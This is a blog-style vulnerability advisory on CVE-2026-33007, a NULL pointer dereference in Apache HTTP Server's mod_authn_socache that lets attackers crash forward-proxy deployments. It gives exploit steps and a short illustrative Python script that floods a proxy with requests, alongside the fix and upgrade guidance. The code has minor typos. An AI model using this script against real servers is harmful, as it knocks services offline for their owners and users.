CVE-2026-33007 - NULL Pointer Dereference in mod_authn_socache Lets Attackers Crash Apache HTTP Server (2.4.66 and Below)

Apache HTTP Server is one of the world’s most widely used web servers, running on millions of machines across the internet. Whenever a new vulnerability is found, system administrators pay close attention. In this post, we break down CVE-2026-33007, an issue found in mod_authn_socache that allows an unauthenticated attacker to crash a part of the server through a NULL pointer dereference bug. While this doesn’t directly lead to code execution or direct data leaks, it does let attackers disrupt the service — a serious Denial of Service (DoS) risk.

In plain language: If you’re running Apache HTTP Server 2.4.66 or earlier and using a forward proxy configuration with authentication caching enabled, your server can be crashed remotely by anyone who knows how to exploit this bug.

Quick Primer: What is mod_authn_socache?

mod_authn_socache is an Apache module used to cache authentication information. This helps improve performance, especially when the server needs to repeatedly authenticate clients in high-traffic environments like forward or reverse proxies.

A forward proxy is when Apache acts as a middleman, fetching resources on behalf of clients.

How Does the Vulnerability Work?

When a request is handled by Apache as a forward proxy, and mod_authn_socache is in use, a code path can be triggered where the module attempts to access an object it expects — but under certain circumstances (like a malformed or unexpected request), that object can be NULL (i.e., not set). The module doesn’t check if the object is NULL before accessing it, leading to a NULL pointer dereference.

Effectively, this means the process handling the request crashes. In typical Apache deployments, each process handles multiple requests, so this can be repeated to cause frequent, continuous crashes — a classic, easy DoS.

Here’s a simplified code snippet to show what the bug might look like (for explanation only)

// in mod_authn_socache.c
auth_cache_object *cache;

// cache may be NULL in some proxy requests
cache = get_authn_cache(r);
if (cache->is_valid) {    // <-- If cache is NULL, this will crash!
    // continue logic 
}

Correct code should check before dereferencing

if (cache != NULL && cache->is_valid) {
    // okay!
}

The patch for the bug (in Apache 2.4.67) adds this type of NULL check.

Exploit Details (How an Attacker Would Do It)

1. Find a vulnerable Apache HTTP Server running version 2.4.66 or lower with API configured as a forward proxy and authentication caching enabled (with mod_authn_socache).

Send a crafted HTTP request that triggers the code path where cache is NULL.

3. Each request causes a child process to crash. In the default multi-process Apache configuration (prefork, worker or event), this only kills the process handling the request, but with sustained requests, the whole service can be massively disrupted.

Below is a Python script that, assuming correct configuration, will cause the crash

import requests

# Change to the IP/port of the vulnerable Apache proxy
url = "http://vulnerable-apache-server:3128";

# Assuming the proxy requires BASIC authentication
proxies = {
    "http": url,
    "https": url,
}

for _ in range(10):
    # Send request with malformed or missing auth headers
    try:
        response = requests.get("http://example.com";, proxies=proxies, timeout=2)
        print("Status:", response.status_code)
    except Exception as e:
        print("Request generated exception, likely crashed process:", e)

*Note:* This is only illustrative. The crash will occur based on the exact authentication configuration.

Mitigation and Fix

DO THIS NOW:
Upgrade Apache HTTP Server to version 2.4.67 or later — this version adds a NULL check and corrects the issue.
See official announcement and fix notes:
- Apache HTTP Server 2.4.67 Release Notes
- Apache Security Advisory

You can also temporarily DISABLE mod_authn_socache or avoid using Apache as a forward proxy, but the *best solution* is to upgrade.

Who Should Worry?

If your company or infrastructure uses Apache as a caching forward proxy and relies on socache for authentication, prioritize this update immediately. Even if that’s not your main setup, review your server settings.

Simple fix: Upgrade to Apache HTTP Server 2.4.67+

Stay safe and always keep core infrastructure up to date!

References

- Official Apache Security Advisory
- Apache HTTP Server Releases
- Apache HTTPD 2.4.67 Release Notes


Questions?
Drop me a message or check out the Apache Server Users mailing list to discuss mitigations and best practices.

Timeline

Published on: 05/04/2026 14:41:27 UTC
Last modified on: 05/05/2026 15:07:42 UTC